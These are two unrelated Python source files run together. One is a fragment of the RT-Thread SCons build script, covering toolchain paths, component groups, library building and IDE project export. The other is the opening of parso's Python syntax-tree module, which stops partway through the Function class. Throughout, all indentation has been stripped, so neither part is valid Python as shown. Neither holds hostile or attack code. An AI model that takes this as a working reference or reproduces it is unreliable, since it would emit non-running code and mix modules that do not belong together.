if rtconfig.PLATFORM == 'armcc' and not os.path.isfile(os.path.join(rtconfig.EXEC_PATH, 'armcc.exe')):
if rtconfig.EXEC_PATH.find('bin40') > 0:
rtconfig.EXEC_PATH = rtconfig.EXEC_PATH.replace('bin40', 'armcc/bin')
Env['LINKFLAGS'] = Env['LINKFLAGS'].replace('RV31', 'armcc')
# reset AR command flags
env['ARCOM'] = '$AR --create $TARGET $SOURCES'
env['LIBPREFIX'] = ''
env['LIBSUFFIX'] = '.lib'
env['LIBLINKPREFIX'] = ''
env['LIBLINKSUFFIX'] = '.lib'
env['LIBDIRPREFIX'] = '--userlibpath '
elif rtconfig.PLATFORM == 'iar':
env['LIBPREFIX'] = ''
env['LIBSUFFIX'] = '.a'
env['LIBLINKPREFIX'] = ''
env['LIBLINKSUFFIX'] = '.a'
env['LIBDIRPREFIX'] = '--search '
# patch for win32 spawn
if env['PLATFORM'] == 'win32':
win32_spawn = Win32Spawn()
win32_spawn.env = env
env['SPAWN'] = win32_spawn.spawn
if env['PLATFORM'] == 'win32':
os.environ['PATH'] = rtconfig.EXEC_PATH + ";" + os.environ['PATH']
else:
os.environ['PATH'] = rtconfig.EXEC_PATH + ":" + os.environ['PATH']
# add program path
env.PrependENVPath('PATH', os.environ['PATH'])
# add rtconfig.h/BSP path into Kernel group
DefineGroup("Kernel", [], [], CPPPATH=[str(Dir('#').abspath)])
# add library build action
act = SCons.Action.Action(BuildLibInstallAction, 'Install compiled library... $TARGET')
bld = Builder(action = act)
Env.Append(BUILDERS = {'BuildLib': bld})
# parse rtconfig.h to get used component
PreProcessor = PatchedPreProcessor()
f = open('rtconfig.h', 'r')
contents = f.read()
f.close()
PreProcessor.process_contents(contents)
BuildOptions = PreProcessor.cpp_namespace
if GetOption('clang-analyzer'):
# perform what scan-build does
env.Replace(
CC = 'ccc-analyzer',
CXX = 'c++-analyzer',
# skip as and link
LINK = 'true',
AS = 'true',)
env["ENV"].update(x for x in os.environ.items() if x[0].startswith("CCC_"))
# only check, don't compile. ccc-analyzer use CCC_CC as the CC.
# fsyntax-only will give us some additional warning messages
env['ENV']['CCC_CC'] = 'clang'
env.Append(CFLAGS=['-fsyntax-only', '-Wall', '-Wno-invalid-source-encoding'])
env['ENV']['CCC_CXX'] = 'clang++'
env.Append(CXXFLAGS=['-fsyntax-only', '-Wall', '-Wno-invalid-source-encoding'])
# remove the POST_ACTION as it will cause meaningless errors(file not
# found or something like that).
rtconfig.POST_ACTION = ''
# generate cconfig.h file
GenCconfigFile(env, BuildOptions)
# auto append '_REENT_SMALL' when using newlib 'nano.specs' option
if rtconfig.PLATFORM == 'gcc' and str(env['LINKFLAGS']).find('nano.specs') != -1:
env.AppendUnique(CPPDEFINES = ['_REENT_SMALL'])
if GetOption('genconfig'):
from genconf import genconfig
genconfig()
exit(0)
if env['PLATFORM'] != 'win32':
AddOption('--menuconfig',
dest = 'menuconfig',
action = 'store_true',
default = False,
help = 'make menuconfig for RT-Thread BSP')
if GetOption('menuconfig'):
from menuconfig import menuconfig
menuconfig(Rtt_Root)
exit(0)
AddOption('--pyconfig',
dest = 'pyconfig',
action = 'store_true',
default = False,
help = 'Python GUI menuconfig for RT-Thread BSP')
AddOption('--pyconfig-silent',
dest = 'pyconfig_silent',
action = 'store_true',
default = False,
help = 'Don`t show pyconfig window')
if GetOption('pyconfig_silent'):
from menuconfig import guiconfig_silent
guiconfig_silent(Rtt_Root)
exit(0)
elif GetOption('pyconfig'):
from menuconfig import guiconfig
guiconfig(Rtt_Root)
exit(0)
configfn = GetOption('useconfig')
if configfn:
from menuconfig import mk_rtconfig
mk_rtconfig(configfn)
exit(0)
if not GetOption('verbose'):
# override the default verbose command string
env.Replace(
ARCOMSTR = 'AR $TARGET',
ASCOMSTR = 'AS $TARGET',
ASPPCOMSTR = 'AS $TARGET',
CCCOMSTR = 'CC $TARGET',
CXXCOMSTR = 'CXX $TARGET',
LINKCOMSTR = 'LINK $TARGET'
)
# fix the linker for C++
if GetDepend('RT_USING_CPLUSPLUS'):
if env['LINK'].find('gcc') != -1:
env['LINK'] = env['LINK'].replace('gcc', 'g++')
# we need to seperate the variant_dir for BSPs and the kernels. BSPs could
# have their own components etc. If they point to the same folder, SCons
# would find the wrong source code to compile.
bsp_vdir = 'build'
kernel_vdir = 'build/kernel'
# board build script
objs = SConscript('SConscript', variant_dir=bsp_vdir, duplicate=0)
# include kernel
objs.extend(SConscript(Rtt_Root + '/src/SConscript', variant_dir=kernel_vdir + '/src', duplicate=0))
# include libcpu
if not has_libcpu:
objs.extend(SConscript(Rtt_Root + '/libcpu/SConscript',
variant_dir=kernel_vdir + '/libcpu', duplicate=0))
# include components
objs.extend(SConscript(Rtt_Root + '/components/SConscript',
variant_dir=kernel_vdir + '/components',
duplicate=0,
exports='remove_components'))
return objs
def PrepareModuleBuilding(env, root_directory, bsp_directory):
import rtconfig
global BuildOptions
global Env
global Rtt_Root
# patch for win32 spawn
if env['PLATFORM'] == 'win32':
win32_spawn = Win32Spawn()
win32_spawn.env = env
env['SPAWN'] = win32_spawn.spawn
Env = env
Rtt_Root = root_directory
# parse bsp rtconfig.h to get used component
PreProcessor = PatchedPreProcessor()
f = open(bsp_directory + '/rtconfig.h', 'r')
contents = f.read()
f.close()
PreProcessor.process_contents(contents)
BuildOptions = PreProcessor.cpp_namespace
# add build/clean library option for library checking
AddOption('--buildlib',
dest='buildlib',
type='string',
help='building library of a component')
AddOption('--cleanlib',
dest='cleanlib',
action='store_true',
default=False,
help='clean up the library by --buildlib')
# add program path
env.PrependENVPath('PATH', rtconfig.EXEC_PATH)
def GetConfigValue(name):
assert type(name) == str, 'GetConfigValue: only string parameter is valid'
try:
return BuildOptions[name]
except:
return ''
def GetDepend(depend):
building = True
if type(depend) == type('str'):
if not depend in BuildOptions or BuildOptions[depend] == 0:
building = False
elif BuildOptions[depend] != '':
return BuildOptions[depend]
return building
# for list type depend
for item in depend:
if item != '':
if not item in BuildOptions or BuildOptions[item] == 0:
building = False
return building
def LocalOptions(config_filename):
from SCons.Script import SCons
# parse wiced_config.h to get used component
PreProcessor = SCons.cpp.PreProcessor()
f = open(config_filename, 'r')
contents = f.read()
f.close()
PreProcessor.process_contents(contents)
local_options = PreProcessor.cpp_namespace
return local_options
def GetLocalDepend(options, depend):
building = True
if type(depend) == type('str'):
if not depend in options or options[depend] == 0:
building = False
elif options[depend] != '':
return options[depend]
return building
# for list type depend
for item in depend:
if item != '':
if not item in options or options[item] == 0:
building = False
return building
def AddDepend(option):
BuildOptions[option] = 1
def MergeGroup(src_group, group):
src_group['src'] = src_group['src'] + group['src']
if 'CCFLAGS' in group:
if 'CCFLAGS' in src_group:
src_group['CCFLAGS'] = src_group['CCFLAGS'] + group['CCFLAGS']
else:
src_group['CCFLAGS'] = group['CCFLAGS']
if 'CPPPATH' in group:
if 'CPPPATH' in src_group:
src_group['CPPPATH'] = src_group['CPPPATH'] + group['CPPPATH']
else:
src_group['CPPPATH'] = group['CPPPATH']
if 'CPPDEFINES' in group:
if 'CPPDEFINES' in src_group:
src_group['CPPDEFINES'] = src_group['CPPDEFINES'] + group['CPPDEFINES']
else:
src_group['CPPDEFINES'] = group['CPPDEFINES']
if 'ASFLAGS' in group:
if 'ASFLAGS' in src_group:
src_group['ASFLAGS'] = src_group['ASFLAGS'] + group['ASFLAGS']
else:
src_group['ASFLAGS'] = group['ASFLAGS']
# for local CCFLAGS/CPPPATH/CPPDEFINES
if 'LOCAL_CCFLAGS' in group:
if 'LOCAL_CCFLAGS' in src_group:
src_group['LOCAL_CCFLAGS'] = src_group['LOCAL_CCFLAGS'] + group['LOCAL_CCFLAGS']
else:
src_group['LOCAL_CCFLAGS'] = group['LOCAL_CCFLAGS']
if 'LOCAL_CPPPATH' in group:
if 'LOCAL_CPPPATH' in src_group:
src_group['LOCAL_CPPPATH'] = src_group['LOCAL_CPPPATH'] + group['LOCAL_CPPPATH']
else:
src_group['LOCAL_CPPPATH'] = group['LOCAL_CPPPATH']
if 'LOCAL_CPPDEFINES' in group:
if 'LOCAL_CPPDEFINES' in src_group:
src_group['LOCAL_CPPDEFINES'] = src_group['LOCAL_CPPDEFINES'] + group['LOCAL_CPPDEFINES']
else:
src_group['LOCAL_CPPDEFINES'] = group['LOCAL_CPPDEFINES']
if 'LINKFLAGS' in group:
if 'LINKFLAGS' in src_group:
src_group['LINKFLAGS'] = src_group['LINKFLAGS'] + group['LINKFLAGS']
else:
src_group['LINKFLAGS'] = group['LINKFLAGS']
if 'LIBS' in group:
if 'LIBS' in src_group:
src_group['LIBS'] = src_group['LIBS'] + group['LIBS']
else:
src_group['LIBS'] = group['LIBS']
if 'LIBPATH' in group:
if 'LIBPATH' in src_group:
src_group['LIBPATH'] = src_group['LIBPATH'] + group['LIBPATH']
else:
src_group['LIBPATH'] = group['LIBPATH']
if 'LOCAL_ASFLAGS' in group:
if 'LOCAL_ASFLAGS' in src_group:
src_group['LOCAL_ASFLAGS'] = src_group['LOCAL_ASFLAGS'] + group['LOCAL_ASFLAGS']
else:
src_group['LOCAL_ASFLAGS'] = group['LOCAL_ASFLAGS']
def DefineGroup(name, src, depend, **parameters):
global Env
if not GetDepend(depend):
return []
# find exist group and get path of group
group_path = ''
for g in Projects:
if g['name'] == name:
group_path = g['path']
if group_path == '':
group_path = GetCurrentDir()
group = parameters
group['name'] = name
group['path'] = group_path
if type(src) == type([]):
group['src'] = File(src)
else:
group['src'] = src
if 'CCFLAGS' in group:
Env.AppendUnique(CCFLAGS = group['CCFLAGS'])
if 'CPPPATH' in group:
paths = []
for item in group['CPPPATH']:
paths.append(os.path.abspath(item))
group['CPPPATH'] = paths
Env.AppendUnique(CPPPATH = group['CPPPATH'])
if 'CPPDEFINES' in group:
Env.AppendUnique(CPPDEFINES = group['CPPDEFINES'])
if 'LINKFLAGS' in group:
Env.AppendUnique(LINKFLAGS = group['LINKFLAGS'])
if 'ASFLAGS' in group:
Env.AppendUnique(ASFLAGS = group['ASFLAGS'])
if 'LOCAL_CPPPATH' in group:
paths = []
for item in group['LOCAL_CPPPATH']:
paths.append(os.path.abspath(item))
group['LOCAL_CPPPATH'] = paths
import rtconfig
if rtconfig.PLATFORM == 'gcc':
if 'CCFLAGS' in group:
group['CCFLAGS'] = utils.GCCC99Patch(group['CCFLAGS'])
if 'LOCAL_CCFLAGS' in group:
group['LOCAL_CCFLAGS'] = utils.GCCC99Patch(group['LOCAL_CCFLAGS'])
# check whether to clean up library
if GetOption('cleanlib') and os.path.exists(os.path.join(group['path'], GroupLibFullName(name, Env))):
if group['src'] != []:
print ('Remove library:'+ GroupLibFullName(name, Env))
fn = os.path.join(group['path'], GroupLibFullName(name, Env))
if os.path.exists(fn):
os.unlink(fn)
if 'LIBS' in group:
Env.AppendUnique(LIBS = group['LIBS'])
if 'LIBPATH' in group:
Env.AppendUnique(LIBPATH = group['LIBPATH'])
# check whether to build group library
if 'LIBRARY' in group:
objs = Env.Library(name, group['src'])
else:
# only add source
objs = group['src']
# merge group
for g in Projects:
if g['name'] == name:
# merge to this group
MergeGroup(g, group)
return objs
# add a new group
Projects.append(group)
return objs
def GetCurrentDir():
conscript = File('SConscript')
fn = conscript.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
return path
PREBUILDING = []
def RegisterPreBuildingAction(act):
global PREBUILDING
assert callable(act), 'Could only register callable objects. %s received' % repr(act)
PREBUILDING.append(act)
def PreBuilding():
global PREBUILDING
for a in PREBUILDING:
a()
def GroupLibName(name, env):
import rtconfig
if rtconfig.PLATFORM == 'armcc':
return name + '_rvds'
elif rtconfig.PLATFORM == 'gcc':
return name + '_gcc'
return name
def GroupLibFullName(name, env):
return env['LIBPREFIX'] + GroupLibName(name, env) + env['LIBSUFFIX']
def BuildLibInstallAction(target, source, env):
lib_name = GetOption('buildlib')
for Group in Projects:
if Group['name'] == lib_name:
lib_name = GroupLibFullName(Group['name'], env)
dst_name = os.path.join(Group['path'], lib_name)
print ('Copy '+lib_name+' => ' +dst_name)
do_copy_file(lib_name, dst_name)
break
def DoBuilding(target, objects):
# merge all objects into one list
def one_list(l):
lst = []
for item in l:
if type(item) == type([]):
lst += one_list(item)
else:
lst.append(item)
return lst
# handle local group
def local_group(group, objects):
if 'LOCAL_CCFLAGS' in group or 'LOCAL_CPPPATH' in group or 'LOCAL_CPPDEFINES' in group or 'LOCAL_ASFLAGS' in group:
CCFLAGS = Env.get('CCFLAGS', '') + group.get('LOCAL_CCFLAGS', '')
CPPPATH = Env.get('CPPPATH', ['']) + group.get('LOCAL_CPPPATH', [''])
CPPDEFINES = Env.get('CPPDEFINES', ['']) + group.get('LOCAL_CPPDEFINES', [''])
ASFLAGS = Env.get('ASFLAGS', '') + group.get('LOCAL_ASFLAGS', '')
for source in group['src']:
objects.append(Env.Object(source, CCFLAGS = CCFLAGS, ASFLAGS = ASFLAGS,
CPPPATH = CPPPATH, CPPDEFINES = CPPDEFINES))
return True
return False
objects = one_list(objects)
program = None
# check whether special buildlib option
lib_name = GetOption('buildlib')
if lib_name:
objects = [] # remove all of objects
# build library with special component
for Group in Projects:
if Group['name'] == lib_name:
lib_name = GroupLibName(Group['name'], Env)
if not local_group(Group, objects):
objects = Env.Object(Group['src'])
program = Env.Library(lib_name, objects)
# add library copy action
Env.BuildLib(lib_name, program)
break
else:
# remove source files with local flags setting
for group in Projects:
if 'LOCAL_CCFLAGS' in group or 'LOCAL_CPPPATH' in group or 'LOCAL_CPPDEFINES' in group:
for source in group['src']:
for obj in objects:
if source.abspath == obj.abspath or (len(obj.sources) > 0 and source.abspath == obj.sources[0].abspath):
objects.remove(obj)
# re-add the source files to the objects
for group in Projects:
local_group(group, objects)
program = Env.Program(target, objects)
EndBuilding(target, program)
def GenTargetProject(program = None):
if GetOption('target') == 'mdk':
from keil import MDKProject
from keil import MDK4Project
from keil import MDK5Project
template = os.path.isfile('template.Uv2')
if template:
MDKProject('project.Uv2', Projects)
else:
template = os.path.isfile('template.uvproj')
if template:
MDK4Project('project.uvproj', Projects)
else:
template = os.path.isfile('template.uvprojx')
if template:
MDK5Project('project.uvprojx', Projects)
else:
print ('No template project file found.')
if GetOption('target') == 'mdk4':
from keil import MDK4Project
MDK4Project('project.uvproj', Projects)
if GetOption('target') == 'mdk5':
from keil import MDK5Project
MDK5Project('project.uvprojx', Projects)
if GetOption('target') == 'iar':
from iar import IARProject
IARProject('project.ewp', Projects)
if GetOption('target') == 'vs':
from vs import VSProject
VSProject('project.vcproj', Projects, program)
if GetOption('target') == 'vs2012':
from vs2012 import VS2012Project
VS2012Project('project.vcxproj', Projects, program)
if GetOption('target') == 'cb':
from codeblocks import CBProject
CBProject('project.cbp', Projects, program)
if GetOption('target') == 'ua':
from ua import PrepareUA
PrepareUA(Projects, Rtt_Root, str(Dir('#')))
if GetOption('target') == 'vsc':
from vsc import GenerateVSCode
GenerateVSCode(Env)
if GetOption('target') == 'cdk':
from cdk import CDKProject
CDKProject('project.cdkproj', Projects)
if GetOption('target') == 'ses':
from ses import SESProject
SESProject(Env)
if GetOption('target') == 'makefile':
from makefile import TargetMakefile
TargetMakefile(Env)
if GetOption('target') == 'eclipse':
from eclipse import TargetEclipse
TargetEclipse(Env, GetOption('reset-project-config'), GetOption('project-name'))
def EndBuilding(target, program = None):
import rtconfig
need_exit = False
Env['target'] = program
Env['project'] = Projects
if hasattr(rtconfig, 'BSP_LIBRARY_TYPE'):
Env['bsp_lib_type'] = rtconfig.BSP_LIBRARY_TYPE
if hasattr(rtconfig, 'dist_handle'):
Env['dist_handle'] = rtconfig.dist_handle
Env.AddPostAction(target, rtconfig.POST_ACTION)
# Add addition clean files
Clean(target, 'cconfig.h')
Clean(target, 'rtua.py')
Clean(target, 'rtua.pyc')
if GetOption('target'):
GenTargetProject(program)
BSP_ROOT = Dir('#').abspath
if GetOption('make-dist') and program != None:
from mkdist import MkDist
MkDist(program, BSP_ROOT, Rtt_Root, Env)
if GetOption('make-dist-strip') and program != None:
from mkdist import MkDist_Strip
MkDist_Strip(program, BSP_ROOT, Rtt_Root, Env)
need_exit = True
if GetOption('make-dist-ide') and program != None:
from mkdist import MkDist
project_path = GetOption('project-path')
project_name = GetOption('project-name')
if not isinstance(project_path, str) or len(project_path) == 0 :
print("\nwarning : --project-path=your_project_path parameter is required.")
print("\nstop!")
exit(0)
if not isinstance(project_name, str) or len(project_name) == 0:
print("\nwarning : --project-name=your_project_name parameter is required.")
print("\nstop!")
exit(0)
rtt_ide = {'project_path' : project_path, 'project_name' : project_name}
MkDist(program, BSP_ROOT, Rtt_Root, Env, rtt_ide)
need_exit = True
if GetOption('cscope'):
from cscope import CscopeDatabase
CscopeDatabase(Projects)
if not GetOption('help') and not GetOption('target'):
if not os.path.exists(rtconfig.EXEC_PATH):
print ("Error: the toolchain path (" + rtconfig.EXEC_PATH + ") is not exist, please check 'EXEC_PATH' in path or rtconfig.py.")
need_exit = True
if need_exit:
exit(0)
def SrcRemove(src, remove):
if not src:
return
src_bak = src[:]
if type(remove) == type('str'):
if os.path.isabs(remove):
remove = os.path.relpath(remove, GetCurrentDir())
remove = os.path.normpath(remove)
for item in src_bak:
if type(item) == type('str'):
item_str = item
else:
item_str = item.rstr()
if os.path.isabs(item_str):
item_str = os.path.relpath(item_str, GetCurrentDir())
item_str = os.path.normpath(item_str)
if item_str == remove:
src.remove(item)
else:
for remove_item in remove:
remove_str = str(remove_item)
if os.path.isabs(remove_str):
remove_str = os.path.relpath(remove_str, GetCurrentDir())
remove_str = os.path.normpath(remove_str)
for item in src_bak:
if type(item) == type('str'):
item_str = item
else:
item_str = item.rstr()
if os.path.isabs(item_str):
item_str = os.path.relpath(item_str, GetCurrentDir())
item_str = os.path.normpath(item_str)
if item_str == remove_str:
src.remove(item)
def GetVersion():
import SCons.cpp
import string
rtdef = os.path.join(Rtt_Root, 'include', 'rtdef.h')
# parse rtdef.h to get RT-Thread version
prepcessor = PatchedPreProcessor()
f = open(rtdef, 'r')
contents = f.read()
f.close()
prepcessor.process_contents(contents)
def_ns = prepcessor.cpp_namespace
version = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_VERSION']))
subversion = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_SUBVERSION']))
if 'RT_REVISION' in def_ns:
revision = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_REVISION']))
return '%d.%d.%d' % (version, subversion, revision)
return '0.%d.%d' % (version, subversion)
def GlobSubDir(sub_dir, ext_name):
import os
import glob
def glob_source(sub_dir, ext_name):
list = os.listdir(sub_dir)
src = glob.glob(os.path.join(sub_dir, ext_name))
for item in list:
full_subdir = os.path.join(sub_dir, item)
if os.path.isdir(full_subdir):
src += glob_source(full_subdir, ext_name)
return src
dst = []
src = glob_source(sub_dir, ext_name)
for item in src:
dst.append(os.path.relpath(item, sub_dir))
return dst
def PackageSConscript(package):
from package import BuildPackage
return BuildPackage(package)
|
|
"""
This is the syntax tree for Python 3 syntaxes. The classes represent
syntax elements like functions and imports.
All of the nodes can be traced back to the `Python grammar file
<https://docs.python.org/3/reference/grammar.html>`_. If you want to know how
a tree is structured, just analyse that file (for each Python version it's a
bit different).
There's a lot of logic here that makes it easier for Jedi (and other libraries)
to deal with a Python syntax tree.
By using :py:meth:`parso.tree.NodeOrLeaf.get_code` on a module, you can get
back the 1-to-1 representation of the input given to the parser. This is
important if you want to refactor a parser tree.
>>> from parso import parse
>>> parser = parse('import os')
>>> module = parser.get_root_node()
>>> module
<Module: @1-1>
Any subclasses of :class:`Scope`, including :class:`Module` has an attribute
:attr:`iter_imports <Scope.iter_imports>`:
>>> list(module.iter_imports())
[<ImportName: import os@1,0>]
Changes to the Python Grammar
-----------------------------
A few things have changed when looking at Python grammar files:
- :class:`Param` does not exist in Python grammar files. It is essentially a
part of a ``parameters`` node. |parso| splits it up to make it easier to
analyse parameters. However this just makes it easier to deal with the syntax
tree, it doesn't actually change the valid syntax.
- A few nodes like `lambdef` and `lambdef_nocond` have been merged in the
syntax tree to make it easier to do deal with them.
Parser Tree Classes
-------------------
"""
import re
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from typing import Tuple
from parso.tree import Node, BaseNode, Leaf, ErrorNode, ErrorLeaf, \
search_ancestor
from parso.python.prefix import split_prefix
from parso.utils import split_lines
_FLOW_CONTAINERS = set(['if_stmt', 'while_stmt', 'for_stmt', 'try_stmt',
'with_stmt', 'async_stmt', 'suite'])
_RETURN_STMT_CONTAINERS = set(['suite', 'simple_stmt']) | _FLOW_CONTAINERS
_FUNC_CONTAINERS = set(
['suite', 'simple_stmt', 'decorated', 'async_funcdef']
) | _FLOW_CONTAINERS
_GET_DEFINITION_TYPES = set([
'expr_stmt', 'sync_comp_for', 'with_stmt', 'for_stmt', 'import_name',
'import_from', 'param', 'del_stmt', 'namedexpr_test',
])
_IMPORTS = set(['import_name', 'import_from'])
class DocstringMixin:
__slots__ = ()
def get_doc_node(self):
"""
Returns the string leaf of a docstring. e.g. ``r'''foo'''``.
"""
if self.type == 'file_input':
node = self.children[0]
elif self.type in ('funcdef', 'classdef'):
node = self.children[self.children.index(':') + 1]
if node.type == 'suite': # Normally a suite
node = node.children[1] # -> NEWLINE stmt
else: # ExprStmt
simple_stmt = self.parent
c = simple_stmt.parent.children
index = c.index(simple_stmt)
if not index:
return None
node = c[index - 1]
if node.type == 'simple_stmt':
node = node.children[0]
if node.type == 'string':
return node
return None
class PythonMixin:
"""
Some Python specific utilities.
"""
__slots__ = ()
def get_name_of_position(self, position):
"""
Given a (line, column) tuple, returns a :py:class:`Name` or ``None`` if
there is no name at that position.
"""
for c in self.children:
if isinstance(c, Leaf):
if c.type == 'name' and c.start_pos <= position <= c.end_pos:
return c
else:
result = c.get_name_of_position(position)
if result is not None:
return result
return None
class PythonLeaf(PythonMixin, Leaf):
__slots__ = ()
def _split_prefix(self):
return split_prefix(self, self.get_start_pos_of_prefix())
def get_start_pos_of_prefix(self):
"""
Basically calls :py:meth:`parso.tree.NodeOrLeaf.get_start_pos_of_prefix`.
"""
# TODO it is really ugly that we have to override it. Maybe change
# indent error leafs somehow? No idea how, though.
previous_leaf = self.get_previous_leaf()
if previous_leaf is not None and previous_leaf.type == 'error_leaf' \
and previous_leaf.token_type in ('INDENT', 'DEDENT', 'ERROR_DEDENT'):
previous_leaf = previous_leaf.get_previous_leaf()
if previous_leaf is None: # It's the first leaf.
lines = split_lines(self.prefix)
# + 1 is needed because split_lines always returns at least [''].
return self.line - len(lines) + 1, 0 # It's the first leaf.
return previous_leaf.end_pos
class _LeafWithoutNewlines(PythonLeaf):
"""
Simply here to optimize performance.
"""
__slots__ = ()
@property
def end_pos(self) -> Tuple[int, int]:
return self.line, self.column + len(self.value)
# Python base classes
class PythonBaseNode(PythonMixin, BaseNode):
__slots__ = ()
class PythonNode(PythonMixin, Node):
__slots__ = ()
class PythonErrorNode(PythonMixin, ErrorNode):
__slots__ = ()
class PythonErrorLeaf(ErrorLeaf, PythonLeaf):
__slots__ = ()
class EndMarker(_LeafWithoutNewlines):
__slots__ = ()
type = 'endmarker'
def __repr__(self):
return "<%s: prefix=%s end_pos=%s>" % (
type(self).__name__, repr(self.prefix), self.end_pos
)
class Newline(PythonLeaf):
"""Contains NEWLINE and ENDMARKER tokens."""
__slots__ = ()
type = 'newline'
def __repr__(self):
return "<%s: %s>" % (type(self).__name__, repr(self.value))
class Name(_LeafWithoutNewlines):
"""
A string. Sometimes it is important to know if the string belongs to a name
or not.
"""
type = 'name'
__slots__ = ()
def __repr__(self):
return "<%s: %s@%s,%s>" % (type(self).__name__, self.value,
self.line, self.column)
def is_definition(self, include_setitem=False):
"""
Returns True if the name is being defined.
"""
return self.get_definition(include_setitem=include_setitem) is not None
def get_definition(self, import_name_always=False, include_setitem=False):
"""
Returns None if there's no definition for a name.
:param import_name_always: Specifies if an import name is always a
definition. Normally foo in `from foo import bar` is not a
definition.
"""
node = self.parent
type_ = node.type
if type_ in ('funcdef', 'classdef'):
if self == node.name:
return node
return None
if type_ == 'except_clause':
if self.get_previous_sibling() == 'as':
return node.parent # The try_stmt.
return None
while node is not None:
if node.type == 'suite':
return None
if node.type in _GET_DEFINITION_TYPES:
if self in node.get_defined_names(include_setitem):
return node
if import_name_always and node.type in _IMPORTS:
return node
return None
node = node.parent
return None
class Literal(PythonLeaf):
__slots__ = ()
class Number(Literal):
type = 'number'
__slots__ = ()
class String(Literal):
type = 'string'
__slots__ = ()
@property
def string_prefix(self):
return re.match(r'\w*(?=[\'"])', self.value).group(0)
def _get_payload(self):
match = re.search(
r'''('{3}|"{3}|'|")(.*)$''',
self.value,
flags=re.DOTALL
)
return match.group(2)[:-len(match.group(1))]
class FStringString(PythonLeaf):
"""
f-strings contain f-string expressions and normal python strings. These are
the string parts of f-strings.
"""
type = 'fstring_string'
__slots__ = ()
class FStringStart(PythonLeaf):
"""
f-strings contain f-string expressions and normal python strings. These are
the string parts of f-strings.
"""
type = 'fstring_start'
__slots__ = ()
class FStringEnd(PythonLeaf):
"""
f-strings contain f-string expressions and normal python strings. These are
the string parts of f-strings.
"""
type = 'fstring_end'
__slots__ = ()
class _StringComparisonMixin:
def __eq__(self, other):
"""
Make comparisons with strings easy.
Improves the readability of the parser.
"""
if isinstance(other, str):
return self.value == other
return self is other
def __hash__(self):
return hash(self.value)
class Operator(_LeafWithoutNewlines, _StringComparisonMixin):
type = 'operator'
__slots__ = ()
class Keyword(_LeafWithoutNewlines, _StringComparisonMixin):
type = 'keyword'
__slots__ = ()
class Scope(PythonBaseNode, DocstringMixin):
"""
Super class for the parser tree, which represents the state of a python
text file.
A Scope is either a function, class or lambda.
"""
__slots__ = ()
def __init__(self, children):
super().__init__(children)
def iter_funcdefs(self):
"""
Returns a generator of `funcdef` nodes.
"""
return self._search_in_scope('funcdef')
def iter_classdefs(self):
"""
Returns a generator of `classdef` nodes.
"""
return self._search_in_scope('classdef')
def iter_imports(self):
"""
Returns a generator of `import_name` and `import_from` nodes.
"""
return self._search_in_scope('import_name', 'import_from')
def _search_in_scope(self, *names):
def scan(children):
for element in children:
if element.type in names:
yield element
if element.type in _FUNC_CONTAINERS:
yield from scan(element.children)
return scan(self.children)
def get_suite(self):
"""
Returns the part that is executed by the function.
"""
return self.children[-1]
def __repr__(self):
try:
name = self.name.value
except AttributeError:
name = ''
return "<%s: %s@%s-%s>" % (type(self).__name__, name,
self.start_pos[0], self.end_pos[0])
class Module(Scope):
"""
The top scope, which is always a module.
Depending on the underlying parser this may be a full module or just a part
of a module.
"""
__slots__ = ('_used_names',)
type = 'file_input'
def __init__(self, children):
super().__init__(children)
self._used_names = None
def _iter_future_import_names(self):
"""
:return: A list of future import names.
:rtype: list of str
"""
# In Python it's not allowed to use future imports after the first
# actual (non-future) statement. However this is not a linter here,
# just return all future imports. If people want to scan for issues
# they should use the API.
for imp in self.iter_imports():
if imp.type == 'import_from' and imp.level == 0:
for path in imp.get_paths():
names = [name.value for name in path]
if len(names) == 2 and names[0] == '__future__':
yield names[1]
def get_used_names(self):
"""
Returns all the :class:`Name` leafs that exist in this module. This
includes both definitions and references of names.
"""
if self._used_names is None:
# Don't directly use self._used_names to eliminate a lookup.
dct = {}
def recurse(node):
try:
children = node.children
except AttributeError:
if node.type == 'name':
arr = dct.setdefault(node.value, [])
arr.append(node)
else:
for child in children:
recurse(child)
recurse(self)
self._used_names = UsedNamesMapping(dct)
return self._used_names
class Decorator(PythonBaseNode):
type = 'decorator'
__slots__ = ()
class ClassOrFunc(Scope):
__slots__ = ()
@property
def name(self):
"""
Returns the `Name` leaf that defines the function or class name.
"""
return self.children[1]
def get_decorators(self):
"""
:rtype: list of :class:`Decorator`
"""
decorated = self.parent
if decorated.type == 'async_funcdef':
decorated = decorated.parent
if decorated.type == 'decorated':
if decorated.children[0].type == 'decorators':
return decorated.children[0].children
else:
return decorated.children[:1]
else:
return []
class Class(ClassOrFunc):
"""
Used to store the parsed contents of a python class.
"""
type = 'classdef'
__slots__ = ()
def __init__(self, children):
super().__init__(children)
def get_super_arglist(self):
"""
Returns the `arglist` node that defines the super classes. It returns
None if there are no arguments.
"""
if self.children[2] != '(': # Has no parentheses
return None
else:
if self.children[3] == ')': # Empty parentheses
return None
else:
return self.children[3]
def _create_params(parent, argslist_list):
"""
`argslist_list` is a list that can contain an argslist as a first item, but
most not. It's basically the items between the parameter brackets (which is
at most one item).
This function modifies the parser structure. It generates `Param` objects
from the normal ast. Those param objects do not exist in a normal ast, but
make the evaluation of the ast tree so much easier.
You could also say that this function replaces the argslist node with a
list of Param objects.
"""
try:
first = argslist_list[0]
except IndexError:
return []
if first.type in ('name', 'fpdef'):
return [Param([first], parent)]
elif first == '*':
return [first]
else: # argslist is a `typedargslist` or a `varargslist`.
if first.type == 'tfpdef':
children = [first]
else:
children = first.children
new_children = []
start = 0
# Start with offset 1, because the end is higher.
for end, child in enumerate(children + [None], 1):
if child is None or child == ',':
param_children = children[start:end]
if param_children: # Could as well be comma and then end.
if param_children[0] == '*' \
and (len(param_children) == 1
or param_children[1] == ',') \
or param_children[0] == '/':
for p in param_children:
p.parent = parent
new_children += param_children
else:
new_children.append(Param(param_children, parent))
start = end
return new_children
class Function(ClassOrFunc):
"""
Used to store the parsed contents of a python function.
Children::
0. <Keyword: def>
1. <Name>
2. parameter list (including open-paren and close-paren <Operator>s)
3. or 5. <Operator: :>
4. or 6. Node() representing function body
3. -> (if annotation is also present)
4. annotation (if present)
"""
type = 'funcdef'
def __init__(self, children):
super().__init__(children)
parameters = self.children[2] # After `def foo`
parameters.children[1:-1] = _create_params(parameters, parameters.children[1:-1])
def _get_param_nodes(self):
return self.children[2].children
def get_params(self):
"""
Returns a list of `Param()`.
"""
